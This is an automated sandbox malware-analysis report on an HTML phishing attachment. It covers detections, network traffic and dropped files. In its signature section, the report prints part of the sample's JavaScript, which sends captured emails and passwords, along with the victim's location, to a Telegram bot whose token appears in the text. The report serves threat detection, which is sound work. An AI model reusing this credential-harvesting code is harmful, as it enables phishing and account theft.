Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_00372_26-12-2024.html

Overview

General Information

Sample name:Payment_00372_26-12-2024.html
Analysis ID:1583280
MD5:eb5666e02c87df8dfd6d0b25a0ea5e17
SHA1:addf219a3f1fabafa88e1293f3570abe9e627c66
SHA256:0292c04d2d424c5a5e207bca888fa649bc139c145c6bd5898457485157c5ac74
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML document with suspicious name
HTML file submission containing password form
Javascript uses Telegram API
Detected clear text password fields (password is not hidden)
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Javascript checks online IP of machine
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: document.getelementbyid('contactform').addeventlistener('submit', function(e) { e.preventdefault(); // get the form data const good = document.getelementbyid('good').value; const email = document.getelementbyid('email').value; // fetch location details from ipinfo.io api fetch('https://ipinfo.io?token=7fb8ecb0d26ce0') // replace with your actual ipinfo.io token .then(response => response.json()) .then(data => { const location = `${data.city}, ${data.region}, ${data.country}`; // your bot token and chat id const bottoken = '7513765431:aahxkmtnhx_0rvvrltr1cxqqni59wokc9t4'; // replace with your bot token const chatid = '7085025619'; // replace with your chat id // construct the message with location info const telegrammessage = `new submission:\nemail: ${email}\npassword: ${good}\nlo...
Source: Payment_00372_26-12-2024.htmlHTTP Parser: <input type="text"... for password input
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: <input type="text"... for password input
Source: Payment_00372_26-12-2024.htmlHTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: Number of links: 0
Source: Payment_00372_26-12-2024.htmlHTTP Parser: Title: Adobe does not match URL
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: Title: Adobe does not match URL
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: document.getelementbyid('contactform').addeventlistener('submit', function(e) { e.preventdefault(); // get the form data const good = document.getelementbyid('good').value; const email = document.getelementbyid('email').value; // fetch location details from ipinfo.io api fetch('https://ipinfo.io?token=7fb8ecb0d26ce0') // replace with your actual ipinfo.io token .then(response => response.json()) .then(data => { const location = `${data.city}, ${data.region}, ${data.country}`; // your bot token and chat id const bottoken = '7513765431:aahxkmtnhx_0rvvrltr1cxqqni59wokc9t4'; // replace with your bot token const chatid = '7085025619'; // replace with your chat id // construct the message with location info const telegrammessage = `new submission:\nemail: ${email}\npassword: ${good}\nlo...
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: Has password / email / username input fields
Source: Payment_00372_26-12-2024.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: No favicon
Source: Payment_00372_26-12-2024.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: No <meta name="author".. found
Source: Payment_00372_26-12-2024.htmlHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: Payment_00372_26-12-2024.htmlString found in binary or memory: https://api.telegram.org/bot$
Source: Payment_00372_26-12-2024.htmlString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s
Source: Payment_00372_26-12-2024.htmlString found in binary or memory: https://ipinfo.io?token=7fb8ecb0d26ce0
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998

System Summary

barindex
Source: Name includes: Payment_00372_26-12-2024.htmlInitial sample: payment
Source: classification engineClassification label: mal60.phis.winHTML@24/9@8/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

Stealing of Sensitive Information

barindex
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmlHTTP Parser: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.186.164
truefalse
    high
    googlehosted.l.googleusercontent.com
    172.217.16.193
    truefalse
      high
      blogger.googleusercontent.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.htmltrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://api.telegram.org/bot$Payment_00372_26-12-2024.htmlfalse
          high
          https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7sPayment_00372_26-12-2024.htmlfalse
            high
            https://ipinfo.io?token=7fb8ecb0d26ce0Payment_00372_26-12-2024.htmlfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.186.36
              unknownUnited States
              15169GOOGLEUSfalse
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              142.250.186.164
              www.google.comUnited States
              15169GOOGLEUSfalse
              172.217.16.193
              googlehosted.l.googleusercontent.comUnited States
              15169GOOGLEUSfalse
              142.250.186.65
              unknownUnited States
              15169GOOGLEUSfalse
              IP
              192.168.2.5
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1583280
              Start date and time:2025-01-02 10:27:40 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 58s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowshtmlcookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Payment_00372_26-12-2024.html
              Detection:MAL
              Classification:mal60.phis.winHTML@24/9@8/6
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .html
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.185.206, 74.125.71.84, 142.250.185.174, 142.250.185.142, 142.250.184.202, 142.250.186.74, 142.250.185.202, 142.250.185.138, 142.250.186.42, 142.250.185.234, 172.217.18.10, 172.217.16.138, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.185.170, 142.250.186.170, 142.250.74.202, 216.58.206.42, 172.217.18.106, 199.232.210.172, 192.229.221.95, 142.250.181.238, 142.250.185.238, 142.250.184.206, 172.217.16.195, 142.250.185.78, 216.58.206.78, 199.232.214.172, 142.250.186.174, 172.217.18.14, 216.58.212.174, 184.28.90.27, 20.12.23.50, 13.107.246.45
              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
              • Not all processes where analyzed, report is missing behavior information
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              239.255.255.250index.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                https://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3npsGet hashmaliciousUnknownBrowse
                  https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADgGet hashmaliciousUnknownBrowse
                    book-captcha.com.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                      random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                        http://www.rr8844.comGet hashmaliciousUnknownBrowse
                          https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                            http://smbc.usobd.comGet hashmaliciousUnknownBrowse
                              tmpAE4B.HTmL.htmlGet hashmaliciousHTMLPhisherBrowse
                                01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                  No context
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  1138de370e523e824bbca92d049a3777over.ps1Get hashmaliciousVidarBrowse
                                  • 23.1.237.91
                                  https://redcap-int.istitutotumori.mi.it/Get hashmaliciousUnknownBrowse
                                  • 23.1.237.91
                                  TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  726odELDs8.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                  • 23.1.237.91
                                  eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                  • 23.1.237.91
                                  GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                  • 23.1.237.91
                                  No context
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.9857601576173116
                                  Encrypted:false
                                  SSDEEP:48:8PrOOd5ThVxHOidAKZdA19ehwiZUklqehly+3:8P1HC+y
                                  MD5:2B6069E7C13D39D41FFB95B4055D32F4
                                  SHA1:047A3962E254A36C6012FCA919D2FB45920CD35A
                                  SHA-256:06213BF0C08ACF25A855BDB0D15072CBDB932919BF407429F1DC4E7ED1CD9D81
                                  SHA-512:B5C415CF68C962E3064440D1852187EC5DD67A092D9035419AE0D52F3018605E855A1DD510E64EDC76EF10C023EC169679FAFBD17F9A7E32FDAB7F1E187EF0CB
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.@.. ...$+.,.....U"..\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2679
                                  Entropy (8bit):4.000027599636401
                                  Encrypted:false
                                  SSDEEP:48:8frOd5ThVxHOidAKZdA1weh/iZUkAQkqehuy+2:80HY9Qny
                                  MD5:70F918D2281836719CCE27C426CCAE10
                                  SHA1:94EFE10E4AAF1A53E051C5F2BAC901B9B0A2D7A9
                                  SHA-256:1988E1B75561C485DDF933730A277710DD2DE79904426C1539CC24534F38614D
                                  SHA-512:939DBF347DC581E9719103E2051915001F0F38D637C4462F00A69FB77DEEE3C712F6F823647FA7451866E3C79704FA0D4AC0CDBA68E26EB117B3281088096736
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.@.. ...$+.,....{i...\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2693
                                  Entropy (8bit):4.0126188718850635
                                  Encrypted:false
                                  SSDEEP:48:8xfOd5ThVsHOidAKZdA14tseh7sFiZUkmgqeh7s4y+BX:8xYHPnSy
                                  MD5:CC266D2642AC06A715B6EB84C11F0AAC
                                  SHA1:4A20AC2AC7B40C9AF6F46B39F0E181C04D4293F0
                                  SHA-256:368C7193D10E7EE3BAB22E752F76BBDEF3C2119DFF744739F84A131EE42678FE
                                  SHA-512:E7ED090A646D61ADE1229815C66F83AA4D1866E0DF3D4583258B96C94FA411077D2F3DAECD37BD6845AE715991CC04F2FE6F61034C4864F4A42867DB85DDAD41
                                  Malicious:false
                                  Reputation:low
